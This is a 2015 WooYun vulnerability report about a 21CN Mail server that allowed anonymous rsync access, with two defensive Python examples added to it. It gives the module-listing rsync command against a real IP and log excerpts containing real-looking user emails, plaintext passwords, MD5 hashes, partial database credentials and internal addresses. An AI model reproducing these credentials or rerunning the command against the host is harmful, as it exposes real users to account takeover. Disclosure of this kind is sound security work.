Vulnerability summary (24 followers)

Defect ID: wooyun-2015-091383

Title: Anonymous RSYNC access on a 21CN Mail server (DEBUG logs contain user passwords)

Vendor: 世纪龙信息网络有限责任公司

Author: 猪猪侠

Submitted: 2015-01-12 15:24

Fixed: 2015-02-26 15:26

Published: 2015-02-26 15:26

Type: Unauthorized access / permission bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-01-12: Details sent to the vendor, awaiting the vendor's response
2015-01-12: Vendor confirmed; details disclosed to the vendor only
2015-01-22: Details disclosed to core white hats and experts in the relevant field
2015-02-01: Details disclosed to regular white hats
2015-02-11: Details disclosed to intern white hats
2015-02-26: Details disclosed to the public

Brief description:

A 21CN Mail server allows anonymous RSYNC access. The modules hold nothing but logs produced by the mail server side; leaving the mailbox database information aside, there are some scripts, some logs and the like. If there were cookies in there that would be serious, right? Sure enough: the DEBUG logs record users' passwords.

Detailed description:

Some of the logs may contain cookies; because of the nature of the test, I did not look at them.

rsync 121.14.129.31:: -av
kbaslog kbaslog
kbaslogfjbnet kbaslog
kbaslogfree kbaslogfree
hermeslogent hermeslogent
aimclog aimclog
kbaslogent kbaslogent
kbaslogpay kbaslogpay
hermeslogfjbnet hermeslog
hermeslogfree hermeslogfree
hermeslogpay hermeslog for mta
medusalog kbas log
medusalogsmtp kbas log
medusalogweb kbas log
medusalogmta kbas log
enthermeslogguid hermeslogent
enthermesloglmtp hermeslogent
enthermeslogimap hermeslogent
enthermeslogmta hermeslogent
enthermeslogms hermeslogent
enthermeslogpop3 hermeslogent
enthermeslogud hermeslogent
enthermeslogwebmail hermeslogent
enthermeslogwebadmin hermeslogent
sync_as_log realtime antispam log
maillog1
maillog2
maillog3
maillog4
maillog5
zhenghe data zhenghe


webmail logs

[2014-08-27 13:00:23,020] [INFO ] resin-tcp-connection-*:8081-79 MailListService - mail list: getLabelList end acc=yamamoto@108628,labelId=1,orderfield=0,orderway=68,page=1,lableList=[{summaryInfo,0,0,null}, {,1,0,{summaryInfo,0,0,null}}, {,2,0,{summaryInfo,0,0,null}}, {,3,0,{summaryInfo,0,0,null}}, {,4,0,{summaryInfo,0,0,null}}, {,5,0,{summaryInfo,0,0,null}}, {,6,0,{summaryInfo,0,0,null}}, {,7,0,{summaryInfo,0,0,null}}, {,8,0,{summaryInfo,0,0,null}}]
[2014-08-27 13:00:23,144] [INFO ] resin-tcp-connection-*:8081-45 ContactService - [cn21-contact-service : ContactService] -> account[spray@iktoy.com], password[spray2005], isWithoutAuth[false] ip[10.28.10.84], type[0] get contact.
[2014-08-27 13:07:17,695] [INFO ] resin-tcp-connection-*:8081-37 ContactService - [cn21-contact-service : ContactService] ->
masked region
*****1], isWithoutAuth[false] ip*****


(image: 21cnmail.jpg)


DEBUG logs contain user passwords

[2015-01-12 13:04:00,145] [DEBUG] tcpConnection-8080-5 HMMUdServer - execute UD command:emailAccount=chenjf32@1269,udId=46,commandId=1,param=AUTO_FORWARD=&OPERATION_FLAG=&LANGUAGE_ID=&IP=10.28.10.84&MAILBOX_MAX_SIZE=&WHITELIST=&MAIL_PER_PAGE=&TEMPLATE_ID=8&POP_SETTING=&CONTACT=&BLACKLIST=&FONT_ID=&AUTO_REPLY_MSG=&SIGNATURE=&SECRET_ANSWER=&COLOR_ID=&WARNING_QUOTA=&SEND_MAIL_NAME=&PASSWORD=&SECRET_QUESTION=,managerAccount=null,ret=AUTO_FORWARD=&SEND_MAIL_NAME=&CONTACT=&IP=&FONT_ID=0&SIGNATURE=&LANGUAGE_ID=0&SECRET_ANSWER=&TEMPLATE_ID=39&WARNING_QUOTA=0&BLACKLIST=&OPERATION_FLAG=8&POP_SETTING=&AUTO_REPLY_MSG=&WHITELIST=&MAIL_PER_PAGE=20&SECRET_QUESTION=&PASSWORD=%7BMD5%7D607d3b7eb6f521f22c7856df720a8462&MAILBOX_MAX_SIZE=1073741824&COLOR_ID=0
[2015-01-12 13:28:40,606] [DEBUG] tcpConnection-8080-6 UdAccoutManager - add usr sb=DEPARTMENT_ID=10040966&CITY_ID=0&CUSTOMER_NAME=tang.yanling%40jstars.cn&OPERATION_FLAG=216&ACCOUNT_STATUS=0&LANGUAGE_ID=0&MAILBOX_MAX_SIZE=1024&REMARK=&MAIL_PER_PAGE=20&TEMPLATE_ID=39&CONTACT_ADDRESS=&COMPANY_PHONE_NUMBER=&OU_ID=10040966&WARNING_QUOTA=0&PASSWORD=tangabc&BIRTHDAY=&OCCUPATION_NAME=&IP=10.28.10.84&PROVINCE_ID=0&ORG_ID=10111306&INVISIBLE=0&AGE_SESSION_ID=0&GENDER=0&CUSTOMER_SN=ÌÆÑÞÁá&GSM_NUMBER=&SEND_MAIL_NAME=ÌÆÑÞÁá&DOMAIN_ID=113083
[2015-01-12 13:27:30,347] [DEBUG] tcpConnection-8080-4 HMMUdServer - execute UD command:emailAccount=frank.han@15164,udId=38,commandId=1,param=AUTO_FORWARD=&OPERATION_FLAG=&LANGUAGE_ID=&IP=10.28.10.88&MAILBOX_MAX_SIZE=&WHITELIST=&MAIL_PER_PAGE=&TEMPLATE_ID=8&POP_SETTING=&CONTACT=&BLACKLIST=&FONT_ID=&A&IP=&FONT_ID=0&SIGNATURE=&LANGUAGE_ID=0&SECRET_ANSWER=&TEMPLATE_ID=39&WARNING_QUOTA=0&BLACKLIST=&OPERATION_FLAG=216&POP_SETTING=&AUTO_REPLY_MSG=&WHITELIST=&MAIL_PER_PAGE=20&SECRET_QUESTION=&PASSWORD=%7BMD5%7Dfa1105eab2c3cfefc46f478d083070b7&MAILBOX_MAX_SIZE=1073741824&COLOR_ID=0
LogonWebmailService - templateId ==== >39
[2015-01-12 13:27:30,363] [DEBUG] tcpConnection-8080-4 LogonWebmailService - Integer.toString(acc.getTemplateId())39
[2015-01-12 13:27:30,364] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,364] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,COLOR_ID,0) ret:1
[2015-01-12 13:27:30,365] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,366] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,FONT_ID,0) ret:1
[2015-01-12 13:27:30,367] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,368] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,WARNING_QUOTA,0) ret:1
[2015-01-12 13:27:30,428] [DEBUG] tcpConnection-8080-4 HMMSessionServer - HMMSessionServer.setObjectValue(CONTACT) use time: 51 ms
[2015-01-12 13:27:30,428] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,437] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,CONTACT,com.cn21.util.Contact@5d7f9a29) ret:1
[2015-01-12 13:27:30,438] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,439] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,OPERATION_FLAG,216) ret:1
[2015-01-12 13:27:30,440] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,440] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,MAILBOX_MAX_SIZE,1073741824) ret:1
[2015-01-12 13:27:30,441] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,442] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,DEF_CHARSET,gb2312) ret:1
[2015-01-12 13:27:30,443] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,443] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,PASSWORD,{MD5}fa1105eab2c3cfefc46f478d083070b7) ret:1


Database connection information of the mail server backend

[2015-01-12 11:00:01,683] [INFO ] 3086404160 ApplicationContext - name:ms-index-
masked region
*****r:=hermes;password:=quy*****


[2015-01-12 11:02:02,079] [INFO ] 3086559808 ApplicationContext - name:hermes,server:=HERMES-DG-FP;
masked region
*****pmail_0958;driver:=oracle;ch*****


[2015-01-12 11:02:02,080] [INFO ] 3086559808 ApplicationContext - name:,server:=;database:=;user:=;password:=;driver:=;charset:=
[2015-01-12 11:02:02,081] [INFO ] 3086559808 ApplicationContext -

masked region
*****rd:=pwd_liyang_1234;driver:=oracle;c*****
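The excerpts above (the ContactService `password[...]` field, `PASSWORD=` values inside the UD parameter strings, the redis `hset(...,PASSWORD,...)` writes and the `password:=` database connection strings) are exactly what a log-hygiene check should catch before logs are written to a shared module. The following Python is an added example, not part of the original report or of the vendor's code: it scans lines of those shapes, distinguishes plaintext values from `{MD5}`-style hashes and redacts them. The sample lines are constructed, with made-up accounts, hashes and passwords.

```python
import re
from urllib.parse import unquote

# Credential fields in the shapes the excerpts show: (label, regex) with group 1 the field
# prefix, group 2 the secret value and, where present, group 3 the closing delimiter.
CREDENTIAL_PATTERNS = [
    ("password[]", re.compile(r"(password\[)([^\]]*)(\])", re.IGNORECASE)),   # ContactService
    ("PASSWORD=", re.compile(r"(PASSWORD=)([^&,\s]*)", re.IGNORECASE)),        # UD parameter strings
    ("redis PASSWORD", re.compile(r"(hset\([^,]*,PASSWORD,)([^)]*)(\))")),     # JedisClient hset
    ("password:=", re.compile(r"(password:=)([^;\s]*)", re.IGNORECASE)),       # DB connection strings
]

def classify_secret(raw):
    """'hashed' for {MD5}/{SHA}-style values, 'plaintext' otherwise, None for an empty value."""
    value = unquote(raw)  # the UD strings URL-encode the braces: %7BMD5%7D... -> {MD5}...
    if not value:
        return None
    return "hashed" if re.match(r"^\{[A-Za-z0-9-]+\}", value) else "plaintext"

def scan_line(line):
    """Return [(label, kind)] for every non-empty credential value on one log line."""
    findings = []
    for label, pat in CREDENTIAL_PATTERNS:
        for m in pat.finditer(line):
            kind = classify_secret(m.group(2))
            if kind:
                findings.append((label, kind))
    return findings

def scan_log(lines):
    """Totals of plaintext and hashed credentials across a log; clean lines contribute nothing."""
    totals = {"plaintext": 0, "hashed": 0}
    for line in lines:
        for _, kind in scan_line(line):
            totals[kind] += 1
    return totals

def redact_line(line):
    """Replace each credential value with <redacted>; field names and empty values are kept."""
    def repl(m):
        tail = m.group(3) if m.re.groups == 3 else ""
        return m.group(0) if not m.group(2) else m.group(1) + "<redacted>" + tail
    for _, pat in CREDENTIAL_PATTERNS:
        line = pat.sub(repl, line)
    return line

# Constructed sample lines modelled on the excerpts; accounts, hashes and passwords are made up.
SAMPLE_LOG = [
    "[2015-01-12 13:00:00,001] [INFO ] resin-tcp-connection-*:8081-1 ContactService - account[alice@example.com], password[s3cret], isWithoutAuth[false] ip[10.0.0.1], type[0] get contact.",
    "[2015-01-12 13:00:00,002] [DEBUG] tcpConnection-8080-1 HMMUdServer - execute UD command:emailAccount=alice@10001,param=TEMPLATE_ID=8&PASSWORD=&IP=10.0.0.1,ret=TEMPLATE_ID=39&PASSWORD=%7BMD5%7D0123456789abcdef0123456789abcdef&COLOR_ID=0",
    "[2015-01-12 13:00:00,003] [DEBUG] tcpConnection-8080-1 UdAccoutManager - add usr sb=CUSTOMER_NAME=bob%40example.com&PASSWORD=bobpass1&IP=10.0.0.1",
    "[2015-01-12 13:00:00,004] [DEBUG] tcpConnection-8080-1 JedisClient - hset(000000000000000-20150112130000000000-000,PASSWORD,{MD5}0123456789abcdef0123456789abcdef) ret:1",
    "[2015-01-12 11:00:01,683] [INFO ] 3086404160 ApplicationContext - name:hermes,server:=DB1;user:=hermes;password:=dbpass;driver:=oracle;charset:=gb2312",
    "[2015-01-12 13:00:00,005] [DEBUG] tcpConnection-8080-1 JedisService - get redis successed in time 0",
]
```

Running `scan_log(SAMPLE_LOG)` gives `{'plaintext': 3, 'hashed': 2}`; note that an `{MD5}` value is still a credential worth redacting, since unsalted MD5 of a user password is trivially reversible for common passwords.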


-rw-r----- 225598 2015/01/02 11:32:10 pop3.2015010210.ent-ssl3.log
-rw-r----- 26487483 2015/01/02 11:08:03 pop3.2015010210.ent13.log
-rw-r----- 26864900 2015/01/02 11:07:11 pop3.2015010210.ent14.log
-rw-r----- 1137000 2015/01/02 11:23:29 pop3.2015010210.ent15.log
-rw-r----- 1150282 2015/01/02 11:24:29 pop3.2015010210.ent16.log
-rw-r----- 8295510 2015/01/02 11:23:30 pop3.2015010210.ent3.log
-rw-r----- 8287110 2015/01/02 11:15:20 pop3.2015010210.ent7.log
-rw-r----- 2529009 2015/01/02 11:14:03 pop3.2015010210.zment-mta1.log
-rw-r----- 1333687 2015/01/02 11:14:09 pop3.2015010210.zment-mta2.log
-rw-r----- 1813795 2015/01/02 11:14:03 pop3.2015010210.zment-mta3.log
-rw-r----- 1398126 2015/01/02 11:14:02 pop3.2015010210.zment-mua1.log
-rw-r----- 3335943 2015/01/02 11:14:04 pop3.2015010210.zment-mua2.log
-rw-r----- 1506940 2015/01/02 11:14:05 pop3.2015010210.zment-mua3.log
-rw-r----- 26560591 2015/01/02 12:29:04 pop3.2015010211.ent-pop1.log
-rw-r----- 26761625 2015/01/02 12:33:04 pop3.2015010211.ent-pop2.log
-rw-r----- 26613621 2015/01/02 12:36:05 pop3.2015010211.ent-pop3.log
-rw-r----- 26745745 2015/01/02 12:20:04 pop3.2015010211.ent-pop4.log
-rw-r----- 26528333 2015/01/02 12:23:03 pop3.2015010211.ent-pop5.log
-rw-r----- 27186101 2015/01/02 12:27:26 pop3.2015010211.ent-pop6.log
-rw-r----- 26893325 2015/01/02 12:27:25 pop3.2015010211.ent-pop7.log
-rw-r----- 27015790 2015/01/02 12:27:28 pop3.2015010211.ent-pop8.log
-rw-r----- 372101 2015/01/02 12:32:10 pop3.2015010211.ent-ssl1.log
-rw-r----- 78252 2015/01/02 12:32:10 pop3.2015010211.ent-ssl2.log
-rw-r----- 225263 2015/01/02 12:32:11 pop3.2015010211.ent-ssl3.log


-rwxr-xr-x 49966 2014/08/21 05:18:01 webmail.2014082104.ent-web2.log.gz
-rwxr-xr-x 58232 2014/08/21 05:21:01 webmail.2014082104.ent-web3.log.gz
-rwxr-xr-x 44895 2014/08/21 05:20:01 webmail.2014082104.ent-web4.log.gz
-rwxr-xr-x 60459 2014/08/21 05:17:01 webmail.2014082104.ent-web5.log.gz
-rwxr-xr-x 36185 2014/08/21 05:19:01 webmail.2014082104.ent-web6.log.gz
-rwxr-xr-x 49 2014/08/21 05:15:11 webmail.2014082104.ent13.log.gz
-rwxr-xr-x 3643 2014/08/21 05:18:20 webmail.2014082104.ent14.log.gz
-rwxr-xr-x 78131 2014/08/21 06:19:01 webmail.2014082105.ent-web1.log.gz
-rwxr-xr-x 42267 2014/08/21 06:18:01 webmail.2014082105.ent-web2.log.gz
-rwxr-xr-x 66315 2014/08/21 06:21:01 webmail.2014082105.ent-web3.log.gz
-rwxr-xr-x 60599 2014/08/21 06:20:01 webmail.2014082105.ent-web4.log.gz
-rwxr-xr-x 28964 2014/08/21 06:17:01 webmail.2014082105.ent-web5.log.gz
-rwxr-xr-x 67922 2014/08/21 06:19:01 webmail.2014082105.ent-web6.log.gz
-rwxr-xr-x 49 2014/08/21 06:15:11 webmail.2014082105.ent13.log.gz
-rwxr-xr-x 3611 2014/08/21 06:15:11 webmail.2014082105.ent14.log.gz
-rwxr-xr-x 166159 2014/08/21 07:19:01 webmail.2014082106.ent-web1.log.gz
-rwxr-xr-x 80258 2014/08/21 07:18:01 webmail.2014082106.ent-web2.log.gz
-rwxr-xr-x 94664 2014/08/21 07:21:01 webmail.2014082106.ent-web3.log.gz
-rwxr-xr-x 86146 2014/08/21 07:20:02 webmail.2014082106.ent-web4.log.gz
-rwxr-xr-x 51431 2014/08/21 07:17:01 webmail.2014082106.ent-web5.log.gz
-rwxr-xr-x 79683 2014/08/21 07:19:01 webmail.2014082106.ent-web6.log.gz
-rwxr-xr-x 49 2014/08/21 07:15:11 webmail.2014082106.ent13.log.gz
-rwxr-xr-x 3639 2014/08/21 07:15:11 webmail.2014082106.ent14.log.gz
-rwxr-xr-x 306795 2014/08/21 08:19:02 webmail.2014082107.ent-web1.log.gz
-rwxr-xr-x 255794 2014/08/21 08:18:02 webmail.2014082107.ent-web2.log.gz
-rwxr-xr-x 244959 2014/08/21 08:21:02 webmail.2014082107.ent-web3.log.gz
-rwxr-xr-x 286663 2014/08/21 08:20:01 webmail.2014082107.ent-web4.log.gz
-rwxr-xr-x 207918 2014/08/21 08:17:02 webmail.2014082107.ent-web5.log.gz
-rwxr-xr-x 235922 2014/08/21 08:19:01 webmail.2014082107.ent-web6.log.gz


[2014-08-21 07:59:27,456] [INFO ] resin-tcp-connection-*:8081-104 MtaServerConfig - func[getMTAConnection] heloMta[60.21.200.227] MtaServerConfig[{smtpent-web.inner-hermes.com,2027,smtp,1}] desc[reconect using helo ip success]
[2014-08-21 07:59:34,868] [INFO ] resin-tcp-connection-*:8081-42 LoginActionAjax - func[singinajax] account[weihong5@cnweihong.com] jsoncallback[jQuery171027891063959938317_1408579316062] action[start login]
[2014-08-21 07:59:34,904] [INFO ] resin-tcp-connection-*:8081-42 LoginActionAjax - func[singinajax] account[weihong5@cnweihong.com] jsoncallback[jQuery171027891063959938317_1408579316062] action[start end]
[2014-08-21 07:59:34,910] [INFO ] resin-tcp-connection-*:8081-104 HMMMtaServer - func[sendJavaMail] heloMta[60.21.200.227] MtaServerConfig[{smtpent-web.inner-hermes.com,2027,smtp,1}] mailInfo[{subject:Re: LN014·¿×â²î¼þ, fromList:jason.yang@vmartcn.com, toList:"wen.zhang" <wen.zhang@vmartcn.com>, size:1202555, attachmentList:[ÉÌÒµ×âÁÞÊý¾Ý±í_LN014.pdf, Liao_Ning_LN014_ÃÉÏéºì_B_to_A.pdf, ·¿ÎÝ×âÁÞºÏͬ¶þ.pdf, ·¿ÎÝ×âÁÞºÏͬһ.pdf], hashCode:11065350}] transPort[smtp://hermes@smtpent-web.inner-hermes.com] desc[send mail success]
[2014-08-21 07:59:34,914] [WARN ] resin-tcp-connection-*:8081-104 SendMailService - func[deleteAutoSaveDraft] oldMessageId[] oldMsId[] emailAccount[jason.yang@119040] udId[38] transId[10.28.10.87:147f5dc8201:7715]
[2014-08-21 07:59:35,023] [INFO ] resin-tcp-connection-*:8081-104 SendMailService - save sended mail size=1652629
[2014-08-21 07:59:35,031] [INFO ] resin-tcp-connection-*:8081-104 HMMUdServer - nativeUdCreateMail mail:Re: LN014·¿×â²î¼þreturn:<0>
[2014-08-21 07:59:35,031] [INFO ] resin-tcp-connection-*:8081-104 SendMailService - save sended mail:ACC=<jason.yang@119040>,MID=<200.10.28.10.87.14085791749140.jason.yang@119040>,MSID=<37>,TID=<10.28.10.87:147f5dc8201:7715>,RDN=<0>
[2014-08-21 07:59:35,439] [INFO ] resin-tcp-connection-*:8081-104 SendMailFlashAction - jason.yang@119040 action end.
[2014-08-21 07:59:35,820] [ERROR] resin-tcp-connection-*:8081-108 GetMailListAction - com.cn21.hermes.exception.SessionException: <SESSION>:8153(error code=8153)
[2014-08-21 07:59:36,363] [INFO ] resin-tcp-connection-*:8081-80 MailReadStatusService - func[getMailStatusById] messageId=<<434954191.6641408577882022.JavaMail.hermes@ent-web3>>,mailAuthor=<xiangliping@leaderchina.cn>,chgTime=<2014-08-21 07:38:05.0>,clientIp=<10.28.10.88>
[2014-08-21 07:59:36,364] [INFO ] resin-tcp-connection-*:8081-80 TrackMailDBPool - -----------TrackMailDBPool.getConnection getTotalCreatedConnections:8 getTotalFree:8 getTotalLeased:0
[2014-08-21 07:59:38,830] [ERROR] resin-tcp-connection-*:8081-80 GetMailListAction - com.cn21.hermes.exception.SessionException: <SESSION>:8153(error code=8153)
[2014-08-21 07:59:39,875] [INFO ] resin-tcp-connection-*:8081-108 SignOnAction - Could not get sid from Cookies
[2014-08-21 07:59:39,875] [INFO ] resin-tcp-connection-*:8081-108 cn21 - 10.28.10.87 session timeout!
[2014-08-21 07:59:41,291] [INFO ] resin-tcp-connection-*:8081-42 chk - check service begin ...
[2014-08-21 07:59:41,360] [INFO ] resin-tcp-connection-*:8081-42 chk - echeck service ok.
[2014-08-21 07:59:41,375] [INFO ] resin-tcp-connection-*:8081-36 LoginServlet - func<parserUrlGetDomain> cookieDomain<.21cn.com>
[2014-08-21 07:59:41,375] [INFO ] resin-tcp-connection-*:8081-36 LoginServlet - customer_url_domain<>
[2014-08-21 07:59:41,390] [INFO ] resin-tcp-connection-*:8081-36 MailMigrationManager - yyhfm.com not need to pop or imap verify
[2014-08-21 07:59:41,391] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - logon: acc=hfmould@yyhfm.com
[2014-08-21 07:59:41,391] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - get GUID.acc=<hfmould@yyhfm.com>,ip=<101.71.150.246>
[2014-08-21 07:59:41,394] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - accWithDomainId<hfmould@126861> webFlag<1>
[2014-08-21 07:59:41,394] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - acc=<hfmould@126861>,domainStatus=<1>
[2014-08-21 07:59:41,394] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - auth UD.acc=<hfmould@126861>,udId=<37>, ip=<101.71.150.246>
[2014-08-21 07:59:41,443] [WARN ] resin-tcp-connection-*:8081-36 MobileSecurityDAO - func[getMobileSecurityInfo] not find record! msg : <UD>DataNotFound.
[2014-08-21 07:59:41,457] [INFO ] resin-tcp-connection-*:8081-36 SSOLoginner - SSOLogon corp.webmail.21cn.com], referer:[http://corp.webmail.21cn.com/webmail/signOn.do], sslLogin:[null]
[2014-08-21 07:59:41,458] [INFO ] resin-tcp-connection-*:8081-36 CookieUtils - userDatauid =< 111111> userDatauid oldUserName =<hfmould@yyhfm.com>,result=<1>
[2014-08-21 07:59:41,458] [INFO ] resin-tcp-connection-*:8081-36 SSOLoginner - logon: sid=<000002050480448-20140820235941440958-020> EmailAccountName : hfmould DomainName : yyhfm.com DomainId : 126861 UdId : 37 cookies : .21cn.com
[2014-08-21 07:59:41,463] [INFO ] resin-tcp-connection-*:8081-36 SSOLoginner - domain:===============ent-web1_mailhost
[2014-08-21 07:59:41,463] [INFO ] resin-tcp-connection-*:8081-36 SSOLoginner - iAddr =<ent-web1/127.0.0.1>,host=< ent-web1>, URL=< http://corp.webmail.21cn.com/webmail/forwardlogin.jsp>, account =<hfmould@yyhfm.com> redirectUrl : http://corp.webmail.21cn.com/webmail/forwardlogin.jsp
[2014-08-21 07:59:41,779] [INFO ] resin-tcp-connection-*:8081-128 LogonAction - logging on from ip=<10.28.10.87>,accountName=null
[2014-08-21 07:59:41,779] [INFO ] resin-tcp-connection-*:8081-128 LogonAction - uudSessionId ====================== 000002050480448-20140820235941440958-020
[2014-08-21 07:59:41,782] [INFO ] resin-tcp-connection-*:8081-128 LogonService - alanstart==1408579181782
[2014-08-21 07:59:41,782] [INFO ] resin-tcp-connection-*:8081-128 LogonService - logon: acc=hfmould@yyhfm.com
[2014-08-21 07:59:41,785] [INFO ] resin-tcp-connection-*:8081-128 LogonService - getDefaultTemplateId == 39
[2014-08-21 07:59:41,785] [INFO ] resin-tcp-connection-*:8081-128 LogonService - set UD TemplateId =>> 39


[2015-01-12 11:00:01,300] [INFO ] 3086404160 config - parse /opt/hermes/bin/../conf/corpmail_edf.xml
[2015-01-12 11:00:01,315] [INFO ] 3086404160 config - parse end
[2015-01-12 11:00:01,315] [INFO ] 3086404160 ApplicationContext - init,args[/opt/hermes/bin/../libexec/hmm_pop3_app -t server -a pop3 -s pop3-svr7 -c /opt/hermes/bin/../conf/corpmail_edf.xml -l /opt/hermes/bin/../conf/pop3_log.xml ] begin

Proof of vulnerability:

10.27.10.232
10.27.10.226


Server passwords were leaked too
cat scp_block.sh

#!/bin/sh
list_file=/opt/chenlh/tuixintongzhi/host.txt
username=root
password="!@*****()"
#src_file=/opt/idns/local.dat
dest_file=/opt/chenlh/
line=result
cat $list_file | while read host
do
./expect_scp $host $username $password $line $dest_file$line
done


cat 1.sh

#!/bin/sh
WORKPATH=/maillog1/hermeslog/ent/mta
time1=`date -d "+1 days ago" +%Y%m%d`
cat /dev/null > tuixin.log
cat /dev/null > deferred.tmp
cat /dev/null > bounce.total
for i in 7 8 9 10 11 12 17 18 19 20
do
cat $WORKPATH/mta.$time1*ent$i.log* >> tuixin.log
done
grep "status=deferred" tuixin.log >deferred.log
cat /dev/null > bounce.total
grep "deferred" tuixin.log | grep -E "lost connection|time out|timed out"|grep -v "127.0.0.1" | awk -F: '{print $4}' | sed 's/^ //'| sort -u >> deferred.tmp
grep "bounce mail" tuixin.log | grep -oP '(?<=queue_id\[)[^]]+' | sort -u >> bounce.total
grep -xFf deferred.tmp bounce.total >> total.net
while read queue_id
do
grep "$queue_id" deferred.log| grep -E "lost connect|time out|timed out"|grep -vE "21cn.com|127.0.0.1" | sort -u -k 6,6 >> net.log
done < total.net
grep "status=bounced" tuixin.log | grep -E "not allowed to connect|blocked using|refused to talk to|rejected due to the sending|is listed in|blacklist|Client host rejected" | grep -vE "127.0.0.1|trace_id" >> rbl.log

Fix recommendation:

IP-based access control (allow only authorized source IPs to reach the rsync service)
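As a worked version of the IP-authorization fix, this added Python example (not from the report or the vendor) audits an rsyncd.conf for modules that any client reaching the port can read, i.e. modules with neither a `hosts allow` list nor `auth users`. It compares a constructed configuration resembling the state the module listing above implies with a hardened one; the subnet 10.27.10.0/24, the user `logsync` and the paths are placeholders.

```python
import configparser

def audit_rsyncd(conf_text):
    """Per-module access controls; module keys fall back to the global section as in rsyncd.conf."""
    cp = configparser.RawConfigParser(default_section="global", strict=False)
    cp.read_string("[global]\n" + conf_text)  # rsyncd.conf globals have no section header
    yes = lambda v: v.strip().lower() in ("yes", "true", "1")
    report = {}
    for module in cp.sections():
        get = lambda key, default=None: cp.get(module, key, fallback=default)
        entry = {
            "host_restricted": get("hosts allow") is not None,   # rsync default: no restriction
            "authenticated": get("auth users") is not None,      # rsync default: anonymous
            "listed": yes(get("list", "yes")),                   # rsync default: list = yes
            "read_only": yes(get("read only", "yes")),           # rsync default: read only = yes
        }
        # Exposed: neither a source-IP allow list nor user authentication guards the module.
        entry["exposed"] = not (entry["host_restricted"] or entry["authenticated"])
        report[module] = entry
    return report

def exposed_modules(conf_text):
    """Sorted names of modules readable by any client that can reach the rsync port."""
    return sorted(m for m, e in audit_rsyncd(conf_text).items() if e["exposed"])

# Constructed configurations, not the real server's. WEAK_CONF mirrors the state the
# report describes: modules listed to everyone with no host or user restriction.
WEAK_CONF = """
uid = nobody

[kbaslog]
path = /maillog1/kbaslog
comment = kbaslog

[hermeslogent]
path = /maillog1/hermeslog/ent
comment = hermeslogent
"""

# HARDENED_CONF: global source-IP allow list (placeholder subnet), modules unlisted and
# readable only by an authenticated user (placeholder name) via a secrets file.
HARDENED_CONF = """
uid = nobody
hosts allow = 10.27.10.0/24
hosts deny = *
list = no

[kbaslog]
path = /maillog1/kbaslog
comment = kbaslog
auth users = logsync
secrets file = /etc/rsyncd.secrets
"""
```

`exposed_modules(WEAK_CONF)` returns `['hermeslogent', 'kbaslog']`, while the hardened configuration returns an empty list; host restriction and authentication address different failure modes (a spoofable or shared network versus a leaked secrets file), so the hardened version uses both.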

Copyright notice: when reposting, please credit the source: 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-01-12 23:22

Vendor reply:

Confirmed

Latest status:

None yet